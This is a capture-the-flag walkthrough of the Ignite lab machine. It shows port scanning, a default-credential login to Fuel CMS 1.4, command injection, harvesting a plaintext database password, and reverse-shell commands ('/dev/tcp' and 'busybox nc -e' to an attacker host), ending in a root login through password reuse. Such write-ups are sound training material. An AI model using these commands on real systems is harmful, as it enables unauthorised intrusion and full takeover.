---
Ignite is an Easy Linux machine running Fuel CMS 1.4 — a content management system left on its default credentials and never updated past a known Remote Code Execution vulnerability. From the CMS admin panel, command injection drops a shell as www-data. A database config file holds a plaintext password, and whoever set this machine up reused it as the root account password.
Scan all ports first, then run service detection only on what is open. Scanning 65535 ports with -sC -sV is slow — running the full sweep at speed first and fingerprinting only confirmed ports cuts the total recon time significantly:
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ nmap -p- -T4 --min-rate 1000 --open --max-retries 2 $TARGET_IP
Starting Nmap 7.94 ( https://nmap.org ) at 2026-08-21 13:10 UTC
Nmap scan report for $TARGET_IP
Host is up (0.030s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 42.17 seconds
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p 80 $TARGET_IP
Starting Nmap 7.94 ( https://nmap.org ) at 2026-08-21 13:11 UTC
Nmap scan report for $TARGET_IP
Host is up (0.030s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMS
| http-robots.txt: 1 disallowed entry:
|_/fuel/
Nmap done: 1 IP address (1 host up) scanned in 8.03 seconds
robots.txt already reveals the admin panel: /fuel/. Fuel CMS 1.4 is identified from the page title.
Navigate to http://$TARGET_IP/fuel/ — the CMS admin login.
Try the default credentials that ship with Fuel CMS and are frequently never changed:
Username: admin
Password: admin
Login succeeds. Fuel CMS 1.4 has a known Remote Code Execution vulnerability in the admin interface — the "Pages" section passes unsanitised input directly to a system call. Commands entered execute as www-data:
Enter Command $ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Enter Command $ uname -a
Linux ubuntu 4.15.0-45-generic #48-Ubuntu SMP Tue Jan 29 16:28:13 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Enter Command $ ls /home
www-data
Enter Command $ ls -la /home/www-data
total 24
drwxr-xr-x 2 root root 4096 Jul 26 2019 .
drwxr-xr-x 3 root root 4096 Jul 26 2019 ..
-rw-r--r-- 1 www-data www-data 33 Jul 26 2019 flag.txt
Enter Command $ less /home/www-data/flag.txt
6470e394cbf6dab6a91682cc8585059b
CMS installations almost always have a database configuration file with plaintext credentials. For Fuel CMS:
Enter Command $ less fuel/application/config/database.php
<?php
defined('BASEPATH') OR exit('No direct script access allowed');
$active_group = 'default';
$query_builder = TRUE;
$db['default'] = array(
'dsn' => '',
'hostname' => 'localhost',
'username' => 'root',
'password' => 'mememe',
'database' => 'fuel_schema',
'dbdriver' => 'mysqli',
...
);
Password found: mememe. Database credentials are frequently reused as system account passwords — test this immediately after finding any config credential.
The web command panel works for reading files but an interactive shell is more practical for further enumeration. Catch a reverse shell:
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
Send from the command panel:
Enter Command $ sh -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1
If filtered, busybox nc works as a fallback — it includes a built-in -e flag that many stripped-down nc binaries lack:
Enter Command $ busybox nc $ATTACKER_IP 4444 -e sh
Listener receives:
connect to [$ATTACKER_IP] from (UNKNOWN) [$TARGET_IP] 52142
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Upgrade to a full TTY:
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html$ ^Z
[1]+ Stopped nc -nlvp 4444
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ stty raw -echo; fg
nc -nlvp 4444
www-data@ubuntu:/var/www/html$ export TERM=xterm
www-data@ubuntu:/var/www/html$
www-data@ubuntu:/var/www/html$ su root
Password: mememe
root@ubuntu:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/var/www/html# cat /root/root.txt
b9bbcb33e11b80be759c4e844862482d
The database password worked directly as the root account password. No exploit required.
-p- before running service detection. Use --min-rate 1000 to keep the full sweep fast, then run -sC -sV only on confirmed open ports — this combination is significantly faster than running a full script scan across all 65535 ports.admin/admin is the single most common CMS misconfiguration and works far more often than it should.robots.txt Disallow entries are not security controls — they tell search crawlers what to skip and simultaneously advertise those paths to attackers.database.php, .env, config.php, settings.py) almost always contain plaintext credentials. They are the first thing to look for after gaining any code execution.su, SSH, and other local accounts.